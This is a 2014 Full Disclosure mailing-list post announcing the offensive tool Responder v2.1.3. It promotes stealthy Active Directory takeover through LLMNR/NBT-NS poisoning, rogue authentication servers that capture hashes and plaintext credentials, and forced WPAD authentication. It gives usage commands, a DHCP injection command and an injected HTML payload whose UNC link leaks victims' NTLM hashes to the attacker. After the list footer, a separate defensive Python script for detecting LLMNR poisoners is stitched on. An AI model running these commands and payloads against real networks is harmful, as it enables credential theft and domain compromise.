Message-ID: <CAG_zyZ_dZgs6xUQuComRoTaGWJC5v0MG=2yCxWoOOWO=GhaVHg@mail.gmail.com>
Date: Fri, 28 Nov 2014 01:31:00 -0500
From: laurent gaffie <laurent.gaffie@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [Tool] Responder v2.1.3

Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default Active Directory environment (including Windows 2012R2). Most of the attacks in this tool are hard to detect and are highly successful.

This version includes several enhancements:

- Analyze Mode: figure out what kind of network you're dealing with before doing anything:
  - Map all workstations, domain forests and SQL servers within a maximum of 12 minutes, with no user interaction. The Lanman module will query any host that sent a Domain Master Browser announcement on the subnet to extract that domain's computer list and additional forests (https://support.microsoft.com/KB/188001 -> "Only the PDC can be a domain master browser").
  - Figure out right away, automatically, if you can use ICMP Redirect on that subnet.
  - Figure out what's going on on this network: is there a NAC/IPS/etc. trying to detect NBT-NS/LLMNR poisoning by sending random nonexistent names?
  - Allows a client/sysadmin to see if remediation was done properly.
- WPAD module: choose whether you want to intercept/inject traffic, get NTLMv1/2 hashes transparently, or get plain text sets of credentials. This module is highly effective and will gather any workstation's set of credentials on a default environment with no user interaction (unless you're using -b for plaintext credentials).
- Kerberos server: grab Kerberos AS-REQ Pre-Auth type 23 hashes (hashcat -m 7500).
- In-scope names or IPs to respond to (LLMNR/NBT-NS).
- Names or IPs (LLMNR/NBT-NS) you don't want to respond to (detected NAC/IPS, out-of-scope multicast LLMNR, etc.).
- Find MSSQL servers with the MSSQL Browser Service, one packet.
- Rogue servers included:
  - SMB: NTLMv1/2, clear text passwords for NT4, and LM hashing downgrade when the --lm option is set.
  - MSSQL auth server: supports NTLMv1, LMv2 hashes and MSSQL plaintext auth.
  - HTTP auth server: NTLMv1/2 and basic.
  - HTTPS: NTLMv1/2 and basic auth.
  - LDAP: NTLMv1/2 and plaintext auth.
  - FTP: clear text credentials.
  - POP3: clear text credentials.
  - SMTP: clear text credentials.
  - IMAP: clear text credentials.

Usage example:

./Responder.py -i YourIP -A
  --> -A Analyze Mode, be a ninja; port scanning is for losers.

./Responder.py -i YourIP -rFv
  --> -r use workstation redirector for NBT-NS
  --> -F force auth on wpad.dat file retrieval (highly efficient)
  --> -v be verbose, print all queries.

./Responder.py -i YourIP -rw
  --> -w enable WPAD server, grab requests and try to inject a custom HTML payload into the HTML page sent to the victim. Default HTML is: "<html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html>". If nothing is specified in Responder.conf under "HTMLToServe" then nothing will be injected.

./FindSQLSrv.py
  --> Map MSSQL servers on your subnet, one packet.

./DHCP.py -I eth0 -i 10.20.30.40 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1
  ##DHCP INFORM##
  --> -i Your IP
  --> -d Domain to inject
  --> -p Primary domain to inject
  --> -s Secondary domain to inject
  --> -r Gateway/Router to inject
  ##/DHCP INFORM##
  --> (Optional -R) Respond to DHCP Requests, inject Linux/Windows clients, usually faster than the actual DHCP server. Use this in conjunction with Responder's DNS server or Pcredz (https://github.com/lgandx/PCredz).

Github: https://github.com/Spiderlabs/Responder
Twitter for the latest updates: https://twitter.com/PythonResponder

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
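The Analyze Mode bullet above notes that a NAC/IPS may look for NBT-NS/LLMNR poisoning by querying random nonexistent names; here is that check from the defender's side, as an added Python example that is not part of Responder or of this post. It sends one LLMNR A query for a random canary hostname to the RFC 4795 multicast group and treats any host that claims an address for it as a poisoning candidate, since no legitimate machine can own a name that was never assigned. The "wks-" canary prefix is an arbitrary choice of this example, and IPv4 LLMNR only (no NBT-NS, no IPv6) is assumed.

```python
import os, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and port

def build_llmnr_query(name, txid):  # LLMNR reuses the DNS header and question layout
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def decode_name(data, off):  # wire name -> (str, next offset); follows 0xC0xx pointers
    labels = []
    while data[off] & 0xC0 != 0xC0:
        ln, off = data[off], off + 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(data[off:off + ln].decode())
        off += ln
    ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
    return ".".join(labels + [decode_name(data, ptr)[0]]), off + 2

def parse_llmnr_response(data):  # -> {'txid', 'name', 'addrs'}, or None for a query
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:
        return None
    off, qname, addrs = 12, None, []
    for _ in range(qd):
        qname, off = decode_name(data, off)
        off += 4  # skip QTYPE and QCLASS
    for _ in range(an):
        _, off = decode_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return {"txid": txid, "name": qname, "addrs": addrs}

def poisoner_addrs(canary, txid, data):  # no legitimate host can own the random canary name
    r = parse_llmnr_response(data)
    return r["addrs"] if r and r["txid"] == txid and r["name"].lower() == canary.lower() else []
def probe(timeout=2.0):  # one canary query; every host that answers is a poisoning candidate
    canary, txid = "wks-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = s.recvfrom(4096)
            hits.append((src, poisoner_addrs(canary, txid, data)))
    except socket.timeout:
        return hits
```

A poisoner configured to ignore names outside its scope (this release adds exactly that option) will not answer a canary, so a silent probe is not proof of a clean subnet; repeat it over time rather than relying on one run.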